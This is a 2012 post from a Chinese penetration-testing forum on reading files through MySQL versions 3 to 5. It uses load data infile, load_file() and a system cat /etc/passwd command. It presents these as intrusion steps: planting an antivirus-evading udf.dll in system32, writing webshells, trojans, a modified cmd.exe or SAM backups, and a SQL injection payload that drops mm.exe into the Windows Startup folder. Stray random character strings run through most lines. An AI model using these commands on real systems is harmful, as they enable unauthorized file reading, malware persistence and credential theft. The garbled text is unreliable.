中国网络渗透测试联盟

标题: mysql下读取文件的几种方式 [打印本页]

作者: admin    时间: 2012-9-13 16:34
标题: mysql下读取文件的几种方式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。 , ~/ k2 v* a( q7 F% f9 k6 X2 G) S% Y
思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同
& ?& i/ p5 M- B: j4 y# u" E  z, e, x/ e7 F- t+ v' ?
mysql3.x下 , c4 n1 L' W: j$ V  q, H  ^

* G5 F! p) ~9 P  u( u不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下 ) u- g; B1 g; x
4 s( x  Z5 z7 h* J8 g( [4 E  t
mysql>create table a (cmd text); 5 U" s9 }2 K2 P4 i& r3 q; Z
mysql>load data infile 'c:\\boot.ini' into table a;
. ~0 Z: A0 x* u% d4 pmysql>select * from a; / ?4 I4 ~/ ~" S, ~1 o7 D

" y4 w" o8 r: K2 r  d$ m0 Xmysql4.x下 0 g. S, D4 n0 k+ e. @
0 |+ }" s3 X6 _& u( V! O
mysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下
$ f9 G- e( ?# V( Y3 R; E3 h0 I0 J( H. Q4 B6 J3 n$ C  i8 O
mysql>create table a (cmd text);
( x% T8 ~* ]3 C& ^7 l6 Pmysql>insert into a (cmd) values (load_file('c:\\boot.ini'));
8 r% {$ X+ a; L8 {5 y2 Vmysql>select * from a; 6 }' g0 L# N' m9 H* i6 q$ K
  Z; @1 Y% P- ~% ^: [8 ?
mysql5.x下 3 W  e, t6 o1 I# M2 x
' v. I+ Z. G7 U
在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下
8 E* p; H. @( J4 U( h5 ?
9 W  P. p& ]1 imysql>system cat /etc/passwd
4 D: i' ^7 q1 r$ P( E: I
, x* b8 \: r7 K4 Q7 E; R8 D3 X) z8 O( d7 M9 p* N" l" }* x
mysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。
& Z2 ~6 g5 {! f9 t: q
# W/ S8 [, e1 _* ^. l) T! s5 r# Y+ {3 O9 P" o/ s
例:把免杀过的udf.dll文件插入系统目录 , S/ k% X# _# ^
' x0 [5 F; B+ S% d) V5 a
create table a (cmd LONGBLOB);
4 x+ a2 }6 p4 j6 R. ^5 u3 sinsert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll'))); 3 T8 H" B5 @) e: @9 e; N
SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';
+ ?1 J5 ?2 `5 I+ l" Z+ V! Y9 W7 p6 h! M. Z0 f
其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。 " E8 f$ t8 e- B; B3 x" T- ~' ]3 A

* m3 j$ U' f5 n5 |! T5 \6 C: {$ T8 b7 K
注入中的语法(未测试)
0 e0 C7 U2 \4 X& \9 A. b
* j7 n" v* O3 J
% h0 [1 x) T' S) \id=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2